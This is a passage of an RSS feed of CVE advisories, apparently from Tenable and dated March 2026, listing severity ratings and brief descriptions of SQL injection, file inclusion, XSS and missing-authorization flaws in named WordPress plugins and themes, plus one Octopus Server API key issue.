            <title><![CDATA[CVE-2026-32403]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32403</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32403</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:56 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in toocheke Toocheke Companion toocheke-companion allows DOM-Based XSS. This issue affects Toocheke Companion: from n/a through <= 1.194.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32403">https://www.tenable.com/cve/CVE-2026-32403</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32402]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32402</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32402</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:56 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in Ays Pro Image Slider by Ays ays-slider allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Image Slider by Ays: from n/a through <= 2.7.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32402">https://www.tenable.com/cve/CVE-2026-32402</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32401]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32401</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32401</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:56 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in BoldGrid Client Invoicing by Sprout Invoices sprout-invoices allows PHP Local File Inclusion. This issue affects Client Invoicing by Sprout Invoices: from n/a through <= 20.8.9.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32401">https://www.tenable.com/cve/CVE-2026-32401</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32400]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32400</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32400</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:55 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemetechMount Boldman boldman allows PHP Local File Inclusion. This issue affects Boldman: from n/a through <= 7.7.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32400">https://www.tenable.com/cve/CVE-2026-32400</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32399]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32399</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32399</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:55 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in David Lingren Media Library Assistant media-library-assistant allows Blind SQL Injection. This issue affects Media Library Assistant: from n/a through <= 3.32.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32399">https://www.tenable.com/cve/CVE-2026-32399</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32398]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32398</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32398</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:55 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') vulnerability in Subrata Mal TeraWallet – For WooCommerce woo-wallet allows Leveraging Race Conditions. This issue affects TeraWallet – For WooCommerce: from n/a through <= 1.5.15.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32398">https://www.tenable.com/cve/CVE-2026-32398</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32397]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32397</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32397</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:55 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in YMC Filter & Grids ymc-smart-filter allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Filter & Grids: from n/a through <= 3.5.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32397">https://www.tenable.com/cve/CVE-2026-32397</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32396]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32396</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32396</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:55 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in RadiusTheme Team tlp-team allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Team: from n/a through <= 5.0.13.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32396">https://www.tenable.com/cve/CVE-2026-32396</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32395]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32395</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32395</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:55 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in Xpro Xpro Addons For Beaver Builder &#8211; Lite xpro-addons-beaver-builder-elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Xpro Addons For Beaver Builder &#8211; Lite: from n/a through <= 1.5.6.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32395">https://www.tenable.com/cve/CVE-2026-32395</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32394]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32394</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32394</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:54 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in PublishPress PublishPress Capabilities capability-manager-enhanced allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects PublishPress Capabilities: from n/a through <= 2.31.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32394">https://www.tenable.com/cve/CVE-2026-32394</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32393]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32393</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32393</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:54 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Creatives_Planet Greenly Theme Addons greenly-addons allows PHP Local File Inclusion. This issue affects Greenly Theme Addons: from n/a through < 8.2.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32393">https://www.tenable.com/cve/CVE-2026-32393</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32392]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32392</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32392</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:54 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Creatives_Planet Greenly greenly allows PHP Local File Inclusion. This issue affects Greenly: from n/a through <= 8.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32392">https://www.tenable.com/cve/CVE-2026-32392</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32391]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32391</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32391</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:54 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in linethemes SmartFix smartfix allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects SmartFix: from n/a through < 1.2.4.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32391">https://www.tenable.com/cve/CVE-2026-32391</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32390]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32390</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32390</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:54 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in linethemes Nanosoft nanosoft allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Nanosoft: from n/a through < 1.3.2.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32390">https://www.tenable.com/cve/CVE-2026-32390</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32388]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32388</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32388</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:54 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in linethemes GLB glb allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects GLB: from n/a through <= 1.2.2.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32388">https://www.tenable.com/cve/CVE-2026-32388</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32387]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32387</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32387</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:54 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in Noor Alam Checkout for PayPal checkout-for-paypal allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Checkout for PayPal: from n/a through <= 1.0.46.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32387">https://www.tenable.com/cve/CVE-2026-32387</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32386]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32386</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32386</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:53 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in EnvoThemes Envo Extra envo-extra allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Envo Extra: from n/a through <= 1.9.13.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32386">https://www.tenable.com/cve/CVE-2026-32386</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32385]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32385</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32385</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:53 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in Metagauss RegistrationMagic custom-registration-form-builder-with-submission-manager allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects RegistrationMagic: from n/a through <= 6.0.7.6.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32385">https://www.tenable.com/cve/CVE-2026-32385</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32384]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32384</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32384</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:53 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in magepeopleteam WpBookingly service-booking-manager allows PHP Local File Inclusion. This issue affects WpBookingly: from n/a through <= 1.2.9.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32384">https://www.tenable.com/cve/CVE-2026-32384</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32383]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32383</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32383</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:53 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in raratheme Ridhi ridhi allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Ridhi: from n/a through <= 1.1.2.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32383">https://www.tenable.com/cve/CVE-2026-32383</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32382]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32382</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32382</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:53 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in raratheme Digital Download digital-download allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Digital Download: from n/a through <= 1.1.4.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32382">https://www.tenable.com/cve/CVE-2026-32382</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32381]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32381</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32381</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:53 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in raratheme App Landing Page app-landing-page allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects App Landing Page: from n/a through <= 1.2.2.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32381">https://www.tenable.com/cve/CVE-2026-32381</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32380]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32380</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32380</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:52 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in raratheme Numinous numinous allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Numinous: from n/a through <= 1.3.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32380">https://www.tenable.com/cve/CVE-2026-32380</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32379]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32379</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32379</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:52 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in raratheme Rara Academic rara-academic allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Rara Academic: from n/a through <= 1.2.2.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32379">https://www.tenable.com/cve/CVE-2026-32379</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32378]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32378</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32378</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:52 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in raratheme Book Landing Page book-landing-page allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Book Landing Page: from n/a through <= 1.2.7.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32378">https://www.tenable.com/cve/CVE-2026-32378</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32377]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32377</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32377</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:52 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in raratheme Pranayama Yoga pranayama-yoga allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Pranayama Yoga: from n/a through <= 1.2.2.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32377">https://www.tenable.com/cve/CVE-2026-32377</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32376]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32376</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32376</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:52 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in raratheme Kalon kalon allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Kalon: from n/a through <= 1.2.9.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32376">https://www.tenable.com/cve/CVE-2026-32376</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32375]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32375</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32375</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:52 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in raratheme Travel Diaries travel-diaries allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Travel Diaries: from n/a through <= 1.2.4.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32375">https://www.tenable.com/cve/CVE-2026-32375</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32374]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32374</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32374</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:51 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in raratheme The Minimal the-minimal allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects The Minimal: from n/a through <= 1.2.9.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32374">https://www.tenable.com/cve/CVE-2026-32374</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32373]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32373</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32373</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:51 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in Cozy Vision SMS Alert Order Notifications sms-alert allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects SMS Alert Order Notifications: from n/a through <= 3.9.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32373">https://www.tenable.com/cve/CVE-2026-32373</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32372]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32372</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32372</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:51 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in RadiusTheme ShopBuilder – Elementor WooCommerce Builder Addons shopbuilder allows Retrieve Embedded Sensitive Data. This issue affects ShopBuilder – Elementor WooCommerce Builder Addons: from n/a through <= 3.2.4.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32372">https://www.tenable.com/cve/CVE-2026-32372</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32371]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32371</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32371</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:51 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in raratheme Elegant Pink elegant-pink allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Elegant Pink: from n/a through <= 1.3.3.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32371">https://www.tenable.com/cve/CVE-2026-32371</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32370]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32370</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32370</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:51 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in raratheme Influencer influencer allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Influencer: from n/a through <= 1.1.7.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32370">https://www.tenable.com/cve/CVE-2026-32370</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32369]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32369</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32369</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:51 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in RadiusTheme Medilink-Core medilink-core allows PHP Local File Inclusion. This issue affects Medilink-Core: from n/a through < 2.0.7.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32369">https://www.tenable.com/cve/CVE-2026-32369</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32368]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32368</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32368</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:51 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in delphiknight Geo to Lat geo-to-lat allows Blind SQL Injection. This issue affects Geo to Lat: from n/a through <= 1.0.19.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32368">https://www.tenable.com/cve/CVE-2026-32368</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32367]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32367</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32367</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:50 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Improper Control of Generation of Code ('Code Injection') vulnerability in Yannick Lefebvre Modal Dialog modal-dialog allows Remote Code Inclusion. This issue affects Modal Dialog: from n/a through <= 3.5.16.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32367">https://www.tenable.com/cve/CVE-2026-32367</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32366]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32366</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32366</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:50 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in robfelty Collapsing Categories collapsing-categories allows Blind SQL Injection. This issue affects Collapsing Categories: from n/a through <= 3.0.9.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32366">https://www.tenable.com/cve/CVE-2026-32366</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32365]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32365</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32365</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:50 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in robfelty Collapsing Archives collapsing-archives allows Blind SQL Injection. This issue affects Collapsing Archives: from n/a through <= 3.0.7.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32365">https://www.tenable.com/cve/CVE-2026-32365</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32364]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32364</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32364</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:50 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in redqteam Turbo Manager turbo-manager allows PHP Local File Inclusion. This issue affects Turbo Manager: from n/a through < 4.0.8.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32364">https://www.tenable.com/cve/CVE-2026-32364</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32363]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32363</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32363</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:50 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in Funlus Oy WPLifeCycle free-php-version-info allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WPLifeCycle: from n/a through <= 3.3.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32363">https://www.tenable.com/cve/CVE-2026-32363</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32362]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32362</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32362</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:50 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in activity-log.com WP Sessions Time Monitoring Full Automatic activitytime allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Sessions Time Monitoring Full Automatic: from n/a through <= 1.1.3.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32362">https://www.tenable.com/cve/CVE-2026-32362</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32361]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32361</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32361</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:49 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Marketing Fire Editorial Calendar editorial-calendar allows DOM-Based XSS. This issue affects Editorial Calendar: from n/a through <= 3.9.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32361">https://www.tenable.com/cve/CVE-2026-32361</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32360]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32360</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32360</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:49 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in richplugins Rich Showcase for Google Reviews widget-google-reviews allows Stored XSS. This issue affects Rich Showcase for Google Reviews: from n/a through <= 6.9.4.3.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32360">https://www.tenable.com/cve/CVE-2026-32360</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-3236]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-3236</link>
            <guid>https://www.tenable.com/cve/CVE-2026-3236</guid>
            <pubDate>Thu, 05 Mar 2026 11:15:54 GMT</pubDate>
            <description><![CDATA[
      <p>Low Severity</p>

      <h3>Description</h3>
      <p>In affected versions of Octopus Server, it was possible to create a new API key from an existing access token, resulting in the new API key having a lifetime exceeding that of the original API key used to mint the access token.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3236">https://www.tenable.com/cve/CVE-2026-3236</a></p>
    ]]></description>
        </item>
        <item>
